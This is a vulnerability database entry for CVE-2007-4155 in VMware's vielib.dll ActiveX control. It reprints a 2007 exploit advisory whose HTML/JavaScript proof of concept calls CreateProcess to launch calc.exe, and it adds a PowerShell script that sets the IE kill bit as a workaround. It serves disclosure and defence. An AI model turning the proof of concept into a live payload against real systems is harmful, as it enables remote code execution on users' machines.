VMware Workstation 'vielib.dll' Directory Traversal Vulnerability

Vulnerability ID: 1113403 | Vulnerability type: Design error
Published: 2007-07-30 | Updated: 2007-11-01
CVE ID: CVE-2007-4155 | CNNVD-ID: CNNVD-200708-024
Platform: Windows | CVSS score: 9.3
|Vulnerability source
https://www.exploit-db.com/exploits/4245
https://www.securityfocus.com/bid/25131
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200708-024
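|Vulnerability details
VMware is virtual PC software that allows two or more Windows, DOS, or Linux systems to run simultaneously on a single machine. Certain ActiveX controls in vielib.dll in EMC VMware 6.0.0 contain an absolute path traversal vulnerability: a remote attacker can execute arbitrary programs via absolute path names in two arguments to the CreateProcess or CreateProcessEx method.
|Vulnerability exploit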
:. GOODFELLAS Security Research TEAM  .:
:. http://goodfellas.shellcode.com.ar .:

VmWare Inc version 6.0.0 CreateProcess & CreateProcessEx Remote Code Execution Exploit
======================================================================================

Internal ID: VULWAR200707300.
-----------

Introduction
------------
vielib.dll is a library included in the Program Vmware Version 6.0.0 from Vmware Inc. Company.


Tested In
---------
- Windows XP SP1/SP2 french/english with IE 6.0 / 7.0.


Summary
-------
The CreateProcess & CreateProcessEx methods don't check whether they're being called
from the application or by malicious users. A remote attacker could craft an HTML page
and execute code on a remote system with the actual user's privileges.


Impact
------
Any computer that uses this software will be exposed to remote code execution.


Workaround
----------
- Activate the Kill bit zero in clsid:0F748FDE-0597-443C-8596-71854C5EA20A
- Unregister vielib.dll using regsvr32.


Timeline
--------
July 30 2007 -- Bug Discovery.
July 30 2007 -- Exploit published.


Credits
-------
 * callAX <callAX@shellcode.com.ar>
 * GoodFellas Security Research Team  <goodfellas.shellcode.com.ar>
 

Technical Details
-----------------


<HTML>
<BODY>
  <object id=_9090909090 classid="clsid:{0F748FDE-0597-443C-8596-71854C5EA20A}"></object>
<SCRIPT>

function _d0_() {
 
 ba="c:\\windows\\system32\\calc.exe"
 ad="c:\\windows\\system32\\calc.exe"
 fO="c:\\windows\\system32\\"
 Od=1

_9090909090.CreateProcess(ba, ad, fO, Od)
 }

</SCRIPT>
<input language=JavaScript onclick=_d0_() type=button value="Proof of Concept">
</BODY>
</HTML>

# milw0rm.com [2007-07-30]
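
The first workaround listed in the advisory, as an added PowerShell example (not part of the original advisory and not VMware tooling): it reports, and with -Apply sets, the Internet Explorer kill bit (Compatibility Flags 0x400) for the CLSID the advisory names, in both the 32-bit and 64-bit registry views. The -Apply switch and the function names are assumptions made for this example.

```powershell
# Added example (not from the advisory). Run elevated; pass -Apply to write.
param([switch]$Apply)

$Clsid   = '{0F748FDE-0597-443C-8596-71854C5EA20A}'  # CLSID named in the advisory
$KillBit = 0x400                                     # kill bit in "Compatibility Flags"
$SubKey  = "SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"

function Get-KillBitState {
    param([Microsoft.Win32.RegistryView]$View)
    $base = [Microsoft.Win32.RegistryKey]::OpenBaseKey('LocalMachine', $View)
    try {
        $key = $base.OpenSubKey($SubKey)             # read-only; $null if absent
        $flags = 0
        if ($key) {
            $flags = [int]$key.GetValue('Compatibility Flags', 0)
            $key.Close()
        }
        [pscustomobject]@{
            View   = $View
            Flags  = '0x{0:X8}' -f $flags
            Killed = ($flags -band $KillBit) -ne 0
        }
    } finally { $base.Close() }
}

function Set-KillBit {
    param([Microsoft.Win32.RegistryView]$View)
    $base = [Microsoft.Win32.RegistryKey]::OpenBaseKey('LocalMachine', $View)
    try {
        $key = $base.CreateSubKey($SubKey)           # creates the key if missing
        try {
            # OR the bit in so any other compatibility flags are preserved.
            $flags = [int]$key.GetValue('Compatibility Flags', 0)
            $key.SetValue('Compatibility Flags', ($flags -bor $KillBit), 'DWord')
        } finally { $key.Close() }
    } finally { $base.Close() }
}

# 32-bit IE on 64-bit Windows reads the 32-bit view (Wow6432Node), so cover both.
$views = @([Microsoft.Win32.RegistryView]::Registry32)
if ([Environment]::Is64BitOperatingSystem) {
    $views += [Microsoft.Win32.RegistryView]::Registry64
}
foreach ($view in $views) {
    if ($Apply -and -not (Get-KillBitState -View $view).Killed) { Set-KillBit -View $view }
    Get-KillBitState -View $view
}
```

Without -Apply the script only reports the current state, so it can double as an audit check across hosts.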
|Affected products
VMWare Workstation 6.0, VMWare Workstation 5.5.4, VMWare Workstation 5.5, VMWare Server 1.0.3, VMWare Player 2.0, VMWare Player 1.0.4, VMWare ACE 2.0
|References

Source: XF
Name: vmware-createprocess-code-execution(35670)
Link: http://xforce.iss.net/xforce/xfdb/35670
Source: BID
Name: 25131
Link: http://www.securityfocus.com/bid/25131
Source: MILW0RM
Name: 4245
Link: http://www.milw0rm.com/exploits/4245
Source: www.vmware.com
Link: http://www.vmware.com/support/ws6/doc/releasenotes_ws6.html
Source: www.vmware.com
Link: http://www.vmware.com/support/ws55/doc/releasenotes_ws55.html
Source: www.vmware.com
Link: http://www.vmware.com/support/server/doc/releasenotes_server.html
Source: www.vmware.com
Link: http://www.vmware.com/support/player2/doc/releasenotes_player2.html
Source: www.vmware.com
Link: http://www.vmware.com/support/player/doc/releasenotes_player.html
Source: www.vmware.com
Link: http://www.vmware.com/support/ace2/doc/releasenotes_ace2.html
Source: www.vmware.com
Link: http://www.vmware.com/support/ace/doc/releasenotes_ace.html
Source: SECTRACK
Name: 1018511
Link: http://www.securitytracker.com/id?1018511
Source: VUPEN
Name: ADV-2007-3229
Link: http://www.frsirt.com/english/advisories/2007/3229
Source: SECUNIA
Name: 26890
Link: http://secunia.com/adviso